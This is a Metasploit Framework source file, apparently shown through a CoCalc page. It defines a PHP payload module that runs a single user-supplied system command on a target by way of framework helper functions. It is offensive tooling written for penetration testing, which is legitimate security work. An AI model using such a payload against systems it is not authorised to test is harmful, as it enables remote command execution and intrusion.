CoCalc -- exec.rb

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/php/exec.rb
¹⁹⁸⁵¹ views

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = :dynamic
8

9
  include Msf::Payload::Single
10
  include Msf::Payload::Php
11

12
  def initialize(info = {})
13
    super(
14
      merge_info(
15
        info,
16
        'Name' => 'PHP Execute Command ',
17
        'Description' => 'Execute a single system command',
18
        'Author' => [ 'egypt' ],
19
        'License' => BSD_LICENSE,
20
        'Platform' => 'php',
21
        'Arch' => ARCH_PHP
22
      )
23
    )
24
    register_options(
25
      [
26
        OptString.new('CMD', [ true, 'The command string to execute' ]),
27
      ]
28
    )
29
  end
30

31
  def php_exec_cmd
32
    # please do not copy me into new code, instead use the #php_exec_cmd method after including Msf::Payload::Php or
33
    # use the PHP adapter payload by selecting any php/unix/cmd/* payload
34
    vars = Rex::RandomIdentifier::Generator.new(language: :php)
35
    shell <<-END_OF_PHP_CODE
36
      #{php_preamble(vars_generator: vars)}
37
      #{php_system_block(vars_generator: vars, cmd: datastore['CMD'])}
38
    END_OF_PHP_CODE
39

40
    Rex::Text.compress(shell)
41
  end
42

43
  #
44
  # Constructs the payload
45
  #
46
  def generate(_opts = {})
47
    return php_exec_cmd
48
  end
49
end
50

51

Product

Resources

Company